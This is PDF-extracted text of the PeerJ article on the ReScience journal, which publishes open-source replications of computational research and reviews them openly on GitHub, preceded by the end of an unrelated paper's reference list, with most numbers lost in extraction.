summarization based on minimum cuts. in proceedings of the nd annual meeting of the association for computational linguistics (acl), pages – , barcelona, spain. bo pang, lillian lee, and shivakumar vaithyanathan. . thumbs up? sentiment classification using ma- chine learning techniques. in proceedings of the acl- conference on empirical methods in natural lan- guage processing (emnlp), pages – , strouds- burg, pa, usa. jeffrey pennington, richard socher, and christopher d. manning. . glove: global vectors for word rep- resentation. in proceedings of the conference on empirical methods in natural language process- ing (emnlp), pages – , doha, qatar. john platt, . advances in large margin classi- fiers, chapter probabilistic outputs for support vector machines and comparisons to regularized likelihood methods. mit press. robert plutchik, . approaches to emotion, chap- ter emotions: a general psychoevolutionary theory, pages – . psychology press. guang qiu, bing liu, jiajun bu, and chun chen. . opinion word expansion and target extraction through double propagation. computational linguis- tics, ( ): – . alec radford, rafal józefowicz, and ilya sutskever. . learning to generate reviews and discovering sentiment. corr, abs/ . . filipe n ribeiro, matheus araújo, pollyanna gonçalves, marcos andré gonçalves, and fabrı́cio benevenuto. . sentibench — a benchmark comparison of state-of-the-practice sentiment analysis methods. epj data science, ( ): – . sara rosenthal, preslav nakov, svetlana kiritchenko, saif mohammad, alan ritter, and veselin stoyanov. . semeval- task : sentiment analysis in twitter. in proceedings of the th international work- shop on semantic evaluation (semeval@naacl- hlt), pages – , denver, co, usa. sara rosenthal, noura farra, and preslav nakov. . semeval- task : sentiment analysis in twit- ter. in proceedings of the th international workshop on semantic evaluation (semeval@acl), pages – , vancouver, canada. sascha rothe, sebastian ebert, and hinrich schütze. . ultradense word embeddings by orthogonal transformation. in proceedings of the con- ference of the north american chapter of the asso- ciation for computational linguistics: human lan- guage technologies (hlt-naacl), pages – , san diego, ca, usa. nitish srivastava, geoffrey e. hinton, alex krizhevsky, ilya sutskever, and ruslan salakhutdinov. . dropout: a simple way to prevent neural networks from overfitting. journal of machine learning re- search (jmlr), ( ): – . philip j. stone, dexter c. dunphy, marshall s. smith, and daniel m. ogilvie. . the general inquirer: a computer approach to content analysis. mit press. songbo tan, xueqi cheng, yuefen wang, and hongbo xu. . adapting naı̈ve bayes to domain adapta- tion for sentiment analysis. in proceedings of the th european conference on ir research (ecir), pages – , toulouse, france. mike thelwall, kevan buckley, georgios paltoglou, di cai, and arvid kappas. . sentiment strength detection in short informal text. journal of the amer- ican society for information science and technology (jasist), ( ): – . mike thelwall, kevan buckley, and georgios paltoglou. . sentiment strength detection for the social web. journal of the american society for information sci- ence and technology (jasist), ( ): – . peter d. turney. . thumbs up or thumbs down? semantic orientation applied to unsupervised classifi- cation of reviews. in proceedings of the th annual meeting of the association for computational linguis- tics (acl), pages – , philadelphia, pa, usa. laurens van der maaten and geoffrey e. hinton. . visualizing data using t-sne. journal of machine learning research (jmlr), (nov): – . stefan wager, sida i. wang, and percy liang. . dropout training as adaptive regularization. in ad- vances in neural information processing systems : annual conference on neural information process- ing systems (nips), pages – , lake tahoe, nv, usa. amy beth warriner, victor kuperman, and marc brys- baert. . norms of valence, arousal, and domi- nance for , english lemmas. behavior research methods, ( ): – . rui xia, chengqing zong, xuelei hu, and erik cambria. . feature ensemble plus sample selection: do- main adaptation for sentiment classification. ieee in- telligent systems, ( ): – . yi yang and jacob eisenstein. . putting things in context: community-specific embedding projections for sentiment analysis. corr, abs/ . . yiming yang and xin liu. . a re-examination of text categorization methods. in proceedings of the nd annual international acm sigir conference on research and development in information retrieval (sigir), pages – , berkeley, ca, usa. yasuhisa yoshida, tsutomu hirao, tomoharu iwata, masaaki nagata, and yuji matsumoto. . trans- fer learning for multiple-domain sentiment analysis - identifying domain dependent/independent word po- larity. in proceedings of the th aaai conference on artificial intelligence (aaai), san francisco, ca, usa. lei zhang, riddhiman ghosh, mohamed dekhil, me- ichun hsu, and bing liu. . combining lexicon- based and learning-based methods for twitter senti- ment analysis. technical report hpl- - , hp laboratories. xiaojin zhu, zoubin ghahramani, and john d. lafferty. . semi-supervised learning using gaussian fields and harmonic functions. in proceedings of the th in- ternational conference on machine learning (icml), pages – , washington, dc, usa. aalborg universitet sustainable computational science the rescience initiative rougier, nicolas; hinsen, konrad; alexandre, frédéric; arildsen, thomas; barba, lorena; benureau, fabien; brown, c. titus; de buyl, pierre; caglayan, ozan; davison, andrew; delsuc, marc andré; detorakis, georgios; diem, alexandra; drix, damien; enel, pierre; girard, benoît; guest, olivia; hall, matt; henriques, rafael; hinaut, xavier; jaron, kamil; khamassi, mehdi; klein, almar; manninen, tiina; marchesi, pietro; mcglinn, dan; metzner, christoph; petchey, owen; ekkehard plesser, hans; poisot, timothée; ram, karthik; ram, yoav; roesch, etienne; rossant, cyrille; rostami, vahid; shifman, aaron; stachelek, joseph; stimberg, marcel; stollmeyer, frank; vaggi, federico; viejo, guillaume; vitay, julien; vostinar, anya; yurchak, roman; zito, tiziano published in: peerj doi (link to publication from publisher): . /peerj-cs. creative commons license cc by . publication date: document version publisher's pdf, also known as version of record link to publication from aalborg university citation for published version (apa): rougier, n., hinsen, k., alexandre, f., arildsen, t., barba, l., benureau, f., brown, c. t., de buyl, p., caglayan, o., davison, a., delsuc, m. a., detorakis, g., diem, a., drix, d., enel, p., girard, b., guest, o., hall, m., henriques, r., ... zito, t. ( ). sustainable computational science: the rescience initiative. peerj, ( e). https://doi.org/ . /peerj-cs. https://doi.org/ . /peerj-cs. https://vbn.aau.dk/en/publications/df - ef- b - f- fc da c ceb https://doi.org/ . /peerj-cs. submitted october accepted november published december corresponding author nicolas p. rougier, nicolas.rougier@inria.fr academic editor feng xia additional information and declarations can be found on page doi . /peerj-cs. copyright rougier et al. distributed under creative commons cc-by . open access sustainable computational science: the rescience initiative nicolas p. rougier , konrad hinsen , frédéric alexandre , thomas arildsen , lorena a. barba , fabien c.y. benureau , c. titus brown , pierre de buyl , ozan caglayan , andrew p. davison , marc-andré delsuc , georgios detorakis , alexandra k. diem , damien drix , pierre enel , benoît girard , olivia guest , matt g. hall , rafael n. henriques , xavier hinaut , kamil s. jaron , mehdi khamassi , almar klein , tiina manninen , pietro marchesi , daniel mcglinn , christoph metzner , owen petchey , hans ekkehard plesser , timothée poisot , karthik ram , yoav ram , etienne roesch , cyrille rossant , vahid rostami , aaron shifman , joseph stachelek , marcel stimberg , frank stollmeier , federico vaggi , guillaume viejo , julien vitay , anya e. vostinar , roman yurchak and tiziano zito inria bordeaux sud-ouest, talence, france centre de biophysique moléculaire upr , cnrs, orléans, france department of electronic systems, technical faculty of it and design, aalborg university, aalborg, denmark department of mechanical and aerospace engineering, the george washington university, washington, d.c., usa department of population health and reproduction, university of california davis, davis, ca, usa instituut voor theoretische fysica, ku leuven, leuven, belgium laboratoire d’informatique (lium), le mans university, le mans, france unic fre , cnrs, gif-sur-yvette, france institut de génétique et de biologie moléculaire et cellulaire, illkirch, france department of cognitive sciences, university of california irvine, irvine, ca, usa computational engineering and design, university of southampton, southampton, united kingdom humboldt universität zu berlin, berlin, germany department of neuroscience, mount sinai school of medicine, new york, ny, usa institute of intelligent systems and robotics, sorbonne universités - upmc univ paris - cnrs, paris, france experimental psychology, university college london, london, greater london, united kingdom ucl great ormond st institute of child health, london, united kingdom champalimaud centre for the unknown, champalimaud neuroscience program, lisbon, portugal department of ecology and evolution, university of lausanne, lausanne, switzerland independent scholar, enschede, the netherlands biomeditech institute and faculty of biomedical sciences and engineering, tampere university of technology, tampere, finland swammerdam institute for life sciences, university of amsterdam, amsterdam, the netherlands department of biology, college of charleston, charleston, sc, usa centre for computer science and informatics research, university of hertfordshire, hatfield, united kingdom department of evolutionary biology and environmental studies, university of zurich, zurich, switzerland faculty of science and technology, norwegian university of life sciences, aas, norway département de sciences biologiques, université de montréal, montréal, qc, canada berkeley institute for data science, university of california, berkeley, ca, usa department of biology, stanford university, stanford, ca, usa centre for integrative neuroscience, university of reading, reading, united kingdom institute of neurology, university college london, london, united kingdom how to cite this article rougier et al. ( ), sustainable computational science: the rescience initiative. peerj comput. sci. :e ; doi . /peerj-cs. https://peerj.com mailto:nicolas.rougier@inria.fr https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/ . /peerj-cs. http://creativecommons.org/licenses/by/ . / http://creativecommons.org/licenses/by/ . / http://dx.doi.org/ . /peerj-cs. institute of neuroscience & medicine, juelich forschungszentrum, jülich, germany department of biology, university of ottawa, ottawa, ontario, canada department of fisheries and wildlife, michigan state university, east lansing, mi, usa sorbonne universités/upmc univ paris /inserm/cnrs/institut de la vision, paris, france max planck institute for dynamics and self-organization, göttingen, lower saxony, germany amazon, seattle, wa, usa department of computer science, chemnitz university of technology, chemnitz, saxony, germany department of computer science, grinnell college, grinnell, ia, usa symerio, palaiseau, france neural information processing group, eberhard karls universität tübingen, tübingen, germany abstract computer science offers a large set of tools for prototyping, writing, running, testing, validating, sharing and reproducing results; however, computational science lags behind. in the best case, authors may provide their source code as a compressed archive and they may feel confident their research is reproducible. but this is not exactly true. james buckheit and david donoho proposed more than two decades ago that an article about computational results is advertising, not scholarship. the actual scholarship is the full software environment, code, and data that produced the result. this implies new workflows, in particular in peer-reviews. existing journals have been slow to adapt: source codes are rarely requested and are hardly ever actually executed to check that they produce the results advertised in the article. rescience is a peer-reviewed journal that targets computational research and encourages the explicit replication of already published research, promoting new and open-source implementations in order to ensure that the original research can be replicated from its description. to achieve this goal, the whole publishing chain is radically different from other traditional scientific journals. rescience resides on github where each new implementation of a computational study is made available together with comments, explanations, and software tests. subjects data science, digital libraries, scientific computing and simulation, social computing keywords computational science, open science, publication, reproducible, replicable, sustainable, github, open peer-review introduction there is a replication crisis in science (baker, ; munafò et al., ). this crisis has been highlighted in fields as diverse as medicine (ioannidis, ), psychology (open science collaboration, ), the political sciences (janz, ), and recently in the biomedical sciences (iqbal et al., ). the reasons behind such non-replicability are as diverse as the domains in which it occurs. in medicine, factors such as study power and bias, the number of other studies on the same question, and importantly, the ratio of true to no relationships among the all relationships probed have been highlighted as important causes (ioannidis, ). in psychology, non-replicability has been blamed on spurious p-values (p-hacking), while in the biomedical sciences (iqbal et al., ), a lack of access to full datasets and rougier et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. detailed protocols for both clinical and non-clinical biomedical investigation is seen as a critical factor. the same remarks were recently issued for chemistry (coudert, ). surprisingly, the computational sciences (in the broad sense) and computer sciences (in the strict sense) are no exception (donoho et al., ; manninen, havela & linne, ) despite the fact they rely on code and data rather than on experimental observations, which should make them immune to the aforementioned problems. when colberg and colleagues ( ) decided to measure the extent of the problem precisely, they investigated the availability of code and data as well as the extent to which this code would actually build with reasonable effort. the results were dramatic: of the (out of ) potentially reproducible papers targeted by the study, the authors managed to ultimately run only (less than %). these low numbers only reflect the authors’ success at running the code. they did not check for correctness of the code (i.e., does the code actually implement what is advertised in the paper), nor the reproducibility of the results (does each run lead to the same results as in the paper). one example of this problem can be found in topalidou et al. ( ), in which the authors tried to replicate results obtained from a computational neuroscience model. source code was not available, neither as supplementary material to the paper nor in a public repository. when the replicators obtained the source code after contacting the corresponding author, they found that it could not be compiled and would be difficult to reuse for other purposes. confronted with this problem, a small but growing number of journals and publishers have reacted by adopting explicit policies for data and software. examples can be seen in the plos instructions on materials and software sharing and on data availability, and in the recent announcement by elife on forking (creating a linked copy of) software used in elife papers to github. such policies help to ensure access to code and data in a well-defined format (perkel, ) but this will not guarantee reproducibility nor correctness. at the educational and methodological levels, things have started to change with a growing literature on best practices for making computations reproducible (sandve et al., ; crook, davison & plesser, ; wilson et al., ; halchenko & hanke, ; janz, ; hinsen, ). related initiatives such as software and data carpentry (wilson, ) are of note since their goal is to make scientists more productive, and their work more reliable, by teaching them basic computing skills. such best practices could be applied to already published research codebases as well, provided the original authors are willing to take on the challenge of re-implementing their software for the sake of better science. unfortunately, this is unlikely since the incentives for doing such time-consuming work are low or nonexistent. furthermore, if the original authors made mistakes in their original implementation, it seems likely that they will reproduce their mistakes in any re-implementation. replication and reproduction while recognition of the replication crisis as a problem for scientific research has increased over time, unfortunately no common terminology has emerged so far. one reason for the diverse use of terms is that each field of research has its own specific technical and rougier et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://journals.plos.org/plosone/s/materials-and-software-sharing http://journals.plos.org/plosone/s/data-availability https://elifesciences.org/elife-news/inside-elife-forking-software-used-elife-papers-github http://dx.doi.org/ . /peerj-cs. social obstacles on the road to publishing results and findings that can be verified by other scientists. here we briefly summarize the obstacles that arise from the use of computers and software in scientific research, and introduce the terminology we will use in the rest of this article. we note, however, that there is some disagreement about this particular choice of terminology even among the authors of this article. reproducing the result of a computation means running the same software on the same input data and obtaining the same results. the goal of a reproduction attempt is to verify that the computational protocol leading to the results has been recorded correctly. performing computations reproducibly can be seen as a form of provenance tracking, the software being a detailed record of all data processing steps. in theory, computation is a deterministic process and exact reproduction should therefore be trivial. in reality, it is very difficult to achieve because of the complexity of today’s software stacks and the tediousness of recording all interactions between a scientist and a computer (although a number of recent tools have attempted to automate such recording, e.g., guo & engler, ; davison, ; murta et al., ). mesnard and barba explain (mesnard & barba, ) how difficult it can be to reproduce a two-year-old computation even though all possible precautions were taken at the time to ensure reproducibility. the most frequent obstacles are the loss of parts of the software or input data, lack of a computing environment that is sufficiently similar to the one used initially, and insufficient instructions for making the software work. an obstacle specific to numerical computations is the use of floating-point arithmetic, whose rules are subject to slightly different interpretations by different compilers and runtime support systems. a large variety of research practices and support tools have been developed recently to facilitate reproducible computations. for a collection of recipes that have proven useful, see kitzes, turek & deniz ( ). publishing a reproducible computational result implies publishing all the software and all the input data, or references to previously published software and data, along with the traditional article describing the work. an obvious added value is the availability of the software and data, which helps readers to gain a better understanding of the work, and can be re-used in other research projects. in addition, reproducibly published results are more trustworthy, because many common mistakes in working with computers can be excluded: mistyping parameter values or input file names, updating the software but forgetting to mention the changes in the description of the method, planning to use one version of some software but actually using a different one, etc. strictly speaking, reproducibility is defined in the context of identical computational environments. however, useful scientific software is expected to be robust with respect to certain changes in this environment. a computer program that produces different results when compiled using different compilers, or run on two different computers, would be considered suspect by most practitioners, even if it were demonstrably correct in one specific environment. ultimately it is not the software that is of interest for science, but the models and methods that it implements. the software is merely a vehicle to perform computations based on these models and methods. if results depend on hard-to-control rougier et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. implementation details of the software, their relation to the underlying models and methods becomes unclear and unreliable. replicating a published result means writing and then running new software based on the description of a computational model or method provided in the original publication, and obtaining results that are similar enough to be considered equivalent. what exactly ‘‘similar enough’’ means strongly depends on the kind of computation being performed, and can only be judged by an expert in the field. the main obstacle to replicability is an incomplete or imprecise description of the models and methods. replicability is a much stronger quality indicator than reproducibility. in fact, reproducibility merely guarantees that all the ingredients of a computation are well documented. it does not imply that any of them are correct and/or appropriate for implementing the models and methods that were meant to be applied, nor that the descriptions of these models and methods are correct and clear. a successful replication shows that two teams have produced independent implementations that generate equivalent results, which makes serious mistakes in either implementation unlikely. moreover, it shows that the second team was able to understand the description provided by the first team. replication can be attempted for both reproducible and non-reproducible results. however, when an attempt to replicate non-reproducible work fails, yielding results too different to be considered equivalent, it can be very difficult to identify the cause of the disagreement. reproducibility guarantees the existence of a precise and complete description of the models and methods being applied in the original work, in the form of software source code, which can be analyzed during the investigation of any discrepancies. the holy grail of computational science is therefore a reproducible replication of reproducible original work. the rescience initiative performing a replication is a daunting task that is traditionally not well rewarded. nevertheless, some people are willing to replicate computational research. the motivations for doing so are very diverse (see box ). students may want to familiarize themselves with a specific scientific domain, and acquire relevant practical experience by replicating important published work. senior researchers may critically need a specific piece of code for a research project and therefore re-implement a published computational method. if these people write a brand new open source implementation of already published research, it is likely that this new implementation will be of interest for other people as well, including the original authors. the question is where to publish such a replication. to the best of our knowledge, no major journal accepts replications in computational science for publication. this was the main motivation for the creation of the rescience journal (https://rescience.github.io) by konrad hinsen and nicolas p. rougier in september . rougier et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://rescience.github.io http://dx.doi.org/ . /peerj-cs. box . authors having published in rescience explain their motivation. (stachelek, ) i was motivated to replicate the results of the original paper because i feel that working through code supplements to blog posts has really helped me learn the process of scientific analysis. i could have published my replication as a blog post but i wanted the exposure and permanency that goes along with journal articles. this was my first experience with formal replication. i think the review was useful because it forced me to consider how the replication would be used by people other than my- self. i have not yet experienced any new interactions following publication. however, i did notify the author of the original implementation about the replication’s publi- cation. i think this may lead to future correspondence. the original author suggested that he would consider submitting his own replications to rescience in the future. (topalidou & rougier, ) our initial motivation and the main reason for replicating the model is that we needed it in order to collaborate with our neurobiologist colleagues. when we arrived in our new lab, the model had just been published ( ) but the original author had left the lab a few months before our arrival. there was no public repository nor version control, and the paper describing the model was incomplete and partly inaccurate. we managed to get our hands on the original sources ( , lines of delphi) only to realize we could not compile them. it took us three months to replicate it using lines of python. but at this time, there was no place to publish this kind of replication to share the new code with colleagues. since then, we have refined the model and made new predictions that have been confirmed. our initial replication effort really gave the model a second life. (viejo, girard & khamassi, ) replicating previous work is a relatively routine task every time we want to build a new model: either because we want to build on this previous work, or because we want to compare our new model to it. we also give replication tasks to m.sc. students every year, as projects. in all these cases, we are confronted with incomplete or inaccurate model descriptions, as well as with the impossibility to obtain the original results. contacting the original authors sometimes solves the problem, but not so often (because of the dog ate my hard drive syndrome). we thus accumulate knowledge, internal to the lab, about which model works and which doesn’t, and how a given model has to be parameterized to really work. without any place to publish it, this knowledge is wasted. publishing it in rescience, opening the discussion publicly, will be a progress for all of us. rescience is an openly-peer-reviewed journal that targets computational research and encourages the explicit replication of already published research. in order to provide the largest possible benefit to the scientific community, replications are required to be reproducible and open-source. in two years of existence, articles have been published and are currently under review (# , # , # , # ). the editorial board covers a wide range of computational sciences (see http://rescience.github.io/board/) and more than volunteers have registered to be reviewers. the scientific domains of published work rougier et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://github.com/rescience/rescience-submission/pull/ https://github.com/rescience/rescience-submission/pull/ https://github.com/rescience/rescience-submission/pull/ https://github.com/rescience/rescience-submission/pull/ http://rescience.github.io/board/ http://dx.doi.org/ . /peerj-cs. are computational neuroscience, neuroimaging, computational ecology and computer graphics, with a majority in computational neuroscience. the most popular programming languages are python and r. the review process takes about days on average and involves about comments. there is a strong bias towards successful replication ( %); experience has taught us that researchers are reluctant to publish failed replications, even when they can prove that the original work is wrong. for young researchers, there is a social/professional risk in publishing articles that show results from a senior researcher to be wrong. until we implement a certified anonymized submission process, this strong bias will most likely remain. one of the specificities of the rescience journal is a publishing chain that is radically different from any other traditional scientific journal, since rescience lives on github, a platform originally designed for collaborative software development. a rescience submission is treated very similarly to a contribution to an open source software project. one of the consequences is that the whole process, from submission via reviewing to publication, is open for anyone to see and even comment on. each submission is considered by a member of the editorial board, who may decide to reject the submission if it does not respect the formal publication criteria of rescience. a submission must contain • a precise reference to the work being replicated, • an explanation of why the authors think they have replicated the paper (same figures, same graphics, same behavior, etc.) or why they have failed, • a description of any difficulties encountered during the replication, • open-source code that produces the replication results, • an explanation of this code for human readers. a complete submission therefore consists of both computer code and an accompanying article, which are sent to rescience in the form of a pull request (the process used on github to submit a proposed modification to a software project). partial replications that cover only some of the results in the original work are acceptable, but must be justified. if the submission respects these criteria, the editor assigns it to two reviewers for further evaluation and tests. the reviewers evaluate the code and the accompanying material in continuous interaction with the authors through the discussion section until both reviewers consider the work acceptable for publication. the goal of the review is thus to help the authors meet the rescience quality standards through discussion. since rescience targets replication of already published work, the criteria of importance or novelty applied by most traditional journals are irrelevant. for a successful submission (i.e., partial or full replication) to be accepted, both reviewers must consider it reproducible and a valid replication of the original work. as we explained earlier, this means that the reviewers • are able to run the proposed implementation on their computers, • obtain the same results as indicated in the accompanying paper, rougier et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. • consider these results sufficiently close to the ones reported in the original paper being replicated. for a failure to replicate submission to be accepted, we require extra steps to be taken. in addition to scrutiny of the submission by reviewers and editors, we will try to contact the authors of the original research, and issue a challenge to the community to spot and report errors in the new implementation. if no errors are found, the submission will be accepted and the original research will be declared non-replicable. since independent implementation is a major feature of replication work, rescience does not allow authors to submit replications of their own research, nor the research of close collaborators. moreover, replication work should be based exclusively on the originally published paper, although exceptions are admitted if properly documented in the replication article. mistakes in the implementation of computational models and methods are often due to biases that authors invariably have, consciously or not. such biases will inevitably carry over to a replication. perhaps even more importantly, cross-fertilization is generally useful in research, and trying to replicate the work of one’s peers might pave the way for a future collaboration, or may give rise to new ideas as a result of the replication effort. lessons learned although rescience is still a young project, the submissions handled so far already provide valuable experience concerning the reproducibility and replicability of computational work in scientific research. short-term and long-term reproducibility while some of the reasons for non-reproducibility are specific to each scientific domain, our experience has shown that there are also some common issues that can be identified. missing code and/or data, undocumented dependencies, and inaccurate or imprecise description appear to be characteristic of much non-reproducible work. moreover, these problems are not always easy to detect even for attentive reviewers, as we discovered when some articles published in rescience turned out to be difficult to reproduce for someone else for exactly the reasons listed above. rescience reviewers are scientists working in the same domain as the submitting authors, because familiarity with the field is a condition for judging if a replication is successful. but this also means that our reviewers share a significant common background with the authors, and that background often includes the software packages and programming languages adopted by their community. in particular, if both authors and reviewers have essential libraries of their community installed on their computers, they may not notice that these libraries are actually dependencies of the submitted code. while solutions to this problem evidently exist (rescience could, for example, request that authors make their software work on a standard computational environment supplied in the form of a virtual machine), they represent an additional effort to authors and therefore discourage them from submitting replication work to rescience. moreover, the evaluation of de-facto reproducibility (‘‘works on my machine’’) rougier et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. by reviewers is useful as well, because it tests the robustness of the code under small variations in the computational environments that are inevitable in real life. our goal is to develop a set of recommendations for authors that represent a workable compromise between reproducibility, robustness, and implementation effort. these recommendations will evolve over time, and we hope that with improving technology we will ultimately reach full reproducibility over a few decades. another issue with reproducibility is that with today’s computing technology, long- term reproducibility can only be achieved by imposing drastic constraints on languages and libraries that are not compatible with the requirements of research computing. this problem is nicely illustrated by mesnard & barba ( ) whose authors report trying to reproduce their own work performed two years earlier. even though barba’s group is committed to reproducible research practices, they did not escape the many problems one can face when trying to re-run a piece of code. as a consequence, code that is written for rescience today will likely cease to be functional at some point in the future. the long-term value of a rescience publication lies not just in the actual code but also in the accompanying article. the combination of the original article and the replication article provide a complete and consistent description of the original work, as evidenced by the fact that replication was possible. even , , or years later, a competent scientist should be able to replicate the work again thanks to these two articles. of course, the new code can also help, but the true long-term value of a replication is the accompanying article. open reviewing the well-known weaknesses of the traditional anonymous peer-reviewing system used by most scientific journals have motivated many experiments with alternative reviewing processes. the variant adopted by rescience is similar to the ones used by f research or peerj, but is even more radically open: anyone can look at rescience submissions and at the complete reviewing process, starting from the assignment of an editor and the invitation of reviewers. moreover, anyone with a github account can intervene by commenting. such interventions could even be anonymous because a github account is not required to advertise a real name or any other identifying element. rescience does currently require all authors, editors, and reviewers to provide real names (which however are not verified in any way), but there are valid reasons to allow anonymity for authors and reviewers, in particular to allow junior scientists to criticize the work of senior colleagues without fear of retribution, and we envisage exploring such options in the future. our experience with this open reviewing system is very positive so far. the exchanges between reviewers and authors are constructive and courteous, without exception. they are more similar in style to a coffee-table discussion than to the judgement/defence style that dominates traditional anonymous reviewing. once reviewers have been invited and have accepted the task, the editors’ main role is to ensure that the review moves forward, by gently reminding everyone to reply within reasonable delays. in addition, the editors occasionally answer questions by authors and reviewers about the rescience publishing process. the possibility to involve participants beyond the traditional group of authors, editors, and reviewers is particularly interesting in the case of rescience, because it can be helpful rougier et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. to solicit input from the authors of the original study that is being replicated. for example, in one recent case (# ), a reviewer suggested asking the author of the original work for permission to re-use an image. the author intervened in the review and granted permission. publishing on the github platform github is a commercial platform for collaborative software development based on the popular version control system git. it offers unlimited free use to public projects, defined as projects whose contents are accessible to everyone. all rescience activities are organized around a few such open source projects hosted by github. this is an unusual choice for a scientific journal, the only other journal hosted on github being the journal of open source software (smith et al., ). in this section, we discuss the advantages and problems resulting from this choice, considering both technical and social issues. there are clear differences between platforms for software development, such as github, and platforms for scientific publishing, such as highwire. the latter tend to be expensive commercial products developed for the needs of large commercial publishers, although the market is beginning to diversify with products such as episciences. more importantly, to the best of our knowledge, no existing scientific publishing platform supports the submission and review of code, which is an essential part of every rescience article. for this reason, the only option for rescience was to adopt a software development platform and develop a set of procedures that make it usable for scientific publishing. our experience shows that the github platform provides excellent support for the reviewing process, which is not surprising given that the review of a scientific article containing code is not fundamentally different from the review of code with accompanying documentation. one potential issue for other journals envisaging adoption of this platform is the necessity that submitting authors have a basic knowledge of the version control system git and of the techniques of collaborative software development. given the code-centric nature of rescience, this has not been a major problem for us, and the minor issues have been resolved by our editors providing technical assistance to authors. it is of course possible that potential authors are completely discouraged from submitting to rescience by their lack of the required technical competence, but so far nobody has provided feedback suggesting that this is a problem. the main inconvenience of the github platform is its almost complete lack of support for the publishing steps, once a submission has successfully passed the reviewing process. at this point, the submission consists of an article text in markdown format plus a set of code and data files in a git repository. the desired archival form is an article in pdf format plus a permanent archive of the submitted code and data, with a digital object identifier (doi) providing a permanent reference. the zenodo platform allows straightforward archiving of snapshots of a repository hosted on github, and issues a doi for the archive. this leaves the task of producing a pdf version of the article, which is currently handled by the managing editor of the submission, in order to ease the technical burden on our authors. a minor inconvenience of the github platform is its implementation of code reviews. it is designed for reviewing contributions to a collaborative project. the contributor submits new code and modifications to existing code in the form of a ‘‘pull request’’, which other rougier et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://github.com/rescience/rescience-submission/pull/ http://github.com/ https://git-scm.com/ http://home.highwire.org/ https://www.episciences.org/ https://zenodo.org/ http://dx.doi.org/ . /peerj-cs. project members can then comment on. in the course of the exchanges, the contributor can update the code and request further comments. once everybody is satisfied, the contribution is ‘‘merged’’ into the main project. in the case of rescience, the collaborative project is the whole journal, and each article submission is a contribution proposed as a pull request. this is, however, not a very intuitive representation of how a journal works. it would be more natural to have a separate repository for each article, an arrangement that would also facilitate the final publishing steps. however, github does not allow code review on a new repository, only on contributions to an already existing one. relying on a free-use offer on a commercial platform poses some additional problems for scientific publishing. github can change its conditions at any time, and could in principle delete or modify rescience contents at any time without prior notice. moreover, in the case of technical problems rendering rescience contents temporarily or permanently inaccessible, the rescience community has no legal claims for compensation because there is no contract that would imply any obligations for github. it would clearly be imprudent to count on github for long-term preservation of rescience content, which is why we deposit accepted articles on zenodo, a platform designed for archiving scientific information and funded by research organizations as an element of public research infrastructure. the use of free services provided by github and zenodo was clearly important to get rescience started. the incentives for the publication of replication work being low, and its importance being recognized only slowly in the scientific community, funding rescience through either author page charges or grants would have created further obstacles to its success. a less obvious advantage of not having to organize funding is that rescience can exist without being backed by any legal entity that would manage its budget. this makes it possible to maintain a community spirit focused on shared scientific objectives, with nobody in a position to influence rescience by explicit or implicit threats of reducing future funding. outlook based on our experience with the rescience initiative, we can engage in informed speculation about possible future evolutions in scientific publishing, in particular concerning replication work. we will not discuss minor technical advances such as a better toolchain for producing pdf articles, but concentrate on long-term improvements in the technology of electronic publishing and, most of all, in the attitude of the scientific community towards the publication, preservation, and verification of computer-aided research. a fundamental technical issue is the difficulty of archiving or accurately describing the software environments in which computational scientists perform their work. a publication should be accompanied by both a human-readable description of this environment and an executable binary form. the human-readable description allows an inspection of the versions of all software packages that were used, for example to check for the impact of bugs that become known only after a study was published. the executable version enables other scientists to re-run the analyses and inspect intermediate results. ideally, the rougier et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. human-readable description would permit rebuilding the executable version, in the same way that software source code permits rebuilding executable binaries. this approach is pursued for example by the package manager guix (courtés & wurmus, ). a more limited but still useful implementation of the same idea exists in the form of the conda package manager (anaconda inc., ), which uses a so-called environment file to describe and reconstruct environments. the main limitation compared to guix is that the packages that make up a conda environment are themselves not reproducible. for example, a conda environment file does not state which compiler versions were used to build a package. containerization, as implemented e.g., by docker (docker inc., ) is currently much discussed, but provides only the executable version without a human-readable description. moreover, the long-term stability of the container file format remains to be evaluated. history has shown that long-term stability in computing technology is achieved only by technology for which it is a design priority, as in the case of the java virtual machine (lindholm & yellin, ). docker, on the contrary, is promoted as a deployment technology with no visible ambition towards archiving of computational environments. today’s electronic publishing platforms for scientific research still show their origins in paper-based publishing. except for the replacement of printed paper by a printable pdf file, not much has changed. although it is increasingly realized that software and data should be integral parts of most scientific publications today, they are at best relegated to the status of ‘‘supplementary material’’, and systematically excluded from the peer review process. in fact, to the best of our knowledge, rescience is the only scientific journal that aims to verify the correctness of scientific software. as our experience has shown, it is far easier to graft publication onto a software development platform than to integrate software reviewing into a publishing platform. furthermore, tools that will allow for the automated validation of computational models and the automated verification of correctness are being actively developed in the community (see, for example, sciunit or osb-model-validation). an integration of such frameworks, which would greatly enhance the verification and validation process, seems feasible for the existing software development platforms. a logical next step is to fully embrace the technology designed for software development, which far better takes into account the specificity of electronic information processing than today’s scientific publishing systems. in addition to the proper handling of code, such an approach offers further advantages. perhaps the most important one is a shift of focus from the paper as a mostly isolated and finished piece of work to scientific progress as a collection of incremental and highly interdependent steps. the software heritage project, whose aim is to create a permanent public archive of all publicly available software source code, adopts exactly this point of view for the preservation of software. as our experience with rescience has shown, integrating the narrative of a scientific article into a framework designed for software development is not difficult at all. publishing and archiving scientific research in software heritage would offer several advantages. the intrinsic identifiers that provide access to the contents of the archive permit unambiguous and permanent references to ongoing projects as well as to snapshots at a specific time, and to whole projects as well as to the individual files that are part of them. such references hold the promise for better rougier et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://github.com/scidash/sciunit https://github.com/opensourcebrain/osb-model-validation 